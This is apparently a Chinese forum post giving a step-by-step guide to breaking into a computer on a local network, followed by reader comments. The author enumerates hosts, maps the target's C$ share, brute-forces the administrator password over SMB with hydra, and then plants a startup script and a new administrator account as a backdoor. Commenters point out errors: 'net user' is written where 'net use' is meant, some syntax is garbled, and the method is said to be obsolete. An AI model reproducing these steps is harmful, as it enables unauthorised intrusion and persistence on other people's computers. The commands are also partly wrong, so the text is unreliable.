一个简单的内网渗透

七年制造

在一个局域网里想要拿下某台计算机怎么做呢？方法是挺多的，在这里我就说一种吧。

• 知道对方的IP，方法有net view命令，然后再ping计算机名。
  
  
• 知道IP后用命令net user k: \\ip\c$ 注：这条命令意思是把对方电脑的c盘映射到自己电脑形成一个k盘 。
  
• 此时如果对方没有设置密码我们就成功在自己电脑有个k盘，如果提示要输入密码，我们还可以用工具hydra进行爆破。
  
• 在命令里输入cd hydra 注：表示进入文件夹
  
• 输入命令hydra.exe -l administrator -p pass.text ip smb 注：准备破解管理员密码，pass.txt是密码文件夹。
  
• 最后拿到管理员密码。成功映射对方c盘到自己电脑形成k盘。
  
• 弄好后，我们是不是要留个后门，方便下次我们进去呢。
  
• 用命令“copy con c:\文件夹名 bat” 注：把这个脚本放到对方开机启动里。
  
• 在对方创建一个账号，用命令“net user 用户名 /add” 然后用命令“net localgroup administrators cracer/add” 注：先创建用户然后把这个账号提权到有管理员权限。方便我们下次进去。
  

朋友们，你们有什么更好好的方法呢，欢迎来留言。

犀利的眼神

第二个命令就错了不是net user 应该是net use

小编醒醒，大清亡了

小猪。

多处错误，没有可行性……

刺客的嘴脸

对方得是裸奔，又没有任何安全设置优化，并且还得是你同局域网

十年前有点用!

小猪。

大禹治水的时候，因为孩子捣鼓这些命令，气的不回家

heyuanfido

win2000热泪盈眶：到底你们还是爱我的。

邓宁

十年前玩过的为什么不建空连接或者端口溢出了

七年制造

这个也能上头条！印度人教你开挂的？